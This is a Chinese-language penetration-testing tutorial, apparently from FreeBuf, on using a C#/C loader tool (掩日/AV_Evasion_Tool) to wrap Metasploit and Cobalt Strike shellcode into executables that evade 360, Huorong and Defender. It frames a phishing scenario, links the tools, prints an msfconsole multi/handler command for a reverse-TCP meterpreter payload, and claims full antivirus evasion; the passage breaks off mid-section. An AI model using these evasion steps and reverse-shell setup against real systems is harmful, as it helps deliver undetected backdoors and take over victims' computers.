渗透测试之地基免杀篇：C#加载msf和CS后门免杀过所有杀软 – 作者:dayuxiyou

系列文章

专辑：渗透测试之地基篇

简介

渗透测试-地基篇

该篇章目的是重新牢固地基，加强每日训练操作的笔记，在记录地基笔记中会有很多跳跃性思维的操作和方式方法，望大家能共同加油学到东西。

请注意：

本文仅用于技术讨论与研究，对于所有笔记中复现的这些终端或者服务器，都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，本站及作者概不负责。

名言：

你对这行的兴趣，决定你在这行的成就！

一、前言

市面上很多技术人员使用C语言编写图形化界面，接下来演示的将是利用C语言编写的图形化框架界面，调用各种机制进行Load注入，方式多种多样，最终达到全免杀的过程。

在对其底层源码进行多层次分析，分析其C语言框架思路，函数对应机制注入的分析，多样化和多元化的方式方法，拓展思路的同时学习简单的方法，能在此基础上做到自己的免杀工具，打造自我logo的免杀工具。

演示非常详细，共演示几种方法全免杀，演示细致从初部署环境到C#语言输出shellcode进行2021年如今全免杀的过程，开始！

二、环境介绍

黑客（攻击者）：

IP：192.168.175.145

系统：kali.2020.4

windows 2019系统是黑客用于Nim编程制作免杀exe的系统。

VPS服务器：

此次模拟环境将直接越过VPS平台，已成功在VPS上进行了钓鱼行为。

办公区域：

系统：windwos 10

IP：192.168.2.142

存在：360、360杀毒、火绒、deferencer，以及全球和全国杀软平台检测。

目前黑客通过kali系统进行攻击行为，通过钓鱼获得了对方的权限后，发现对方电脑上存在360、360杀毒、火绒、deferencer直接被杀软进行了查杀，无法进行反弹shell获得权限，如今将演示利用C语言框架配合C#语言进行六种加密混淆方式，以及底层分析生成免杀exe，并控制对方的过程。

三、环境部署

在Windows server 2019系统环境进行开始部署：

1、安装gcc环境

安装地址：

https://github.com/jmeubank/tdm-gcc/releases/download/v9.2.0-tdm64-1/tdm64-gcc-9.2.0.exe

选择Create

如图选择

选择安装目录

默认选择

成功安装！

2、下载AV_Evasion_Tool

项目地址：

https://github.com/dayuxiyou/AV_Evasion_Tool/tags

可看到作者2020年出了4个版本，底层分析四个版本都可以下载下来。

下载后，分别打开2.0和3.0文件夹底部的.sln，选择Visual Studio 2019打开。

2.0和3.0执行方式一致，都重新生成即可。

在bin/Debug目录下运行exe即可。

四、掩日2.0演示

1、测试msf后门

目前打开第一界面是极简界面。
填入本地开启的本端监听IP+端口，点击生成。

生成后测试效果，全免杀。

攻击系统kali运行msf：

msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.175.2; set lport 4444; exploit -j; "

在三件套杀软下，免杀并运行动态交互命令，正常。

2、进阶版介绍

1. 支持32和64位系统

2. 支持C和C#语言的shellcode编译

3. 执行方式有四种

4. 注入进程写死为：notepad.exe #可在底层修改

5. 可简单过沙箱。

只需要在框中黏贴shellcode代码执行即可生成exe后门。

1）创建shellcode-C#/C

创建C#和C的shellcode。

2）C-shellcode测试免杀

在测试C的shellcode生成时…

四种方式执行生成的后门都是直接被秒杀！

3）C#-shellcode测试免杀

来源：freebuf.com 2021-02-02 16:25:26 by: dayuxiyou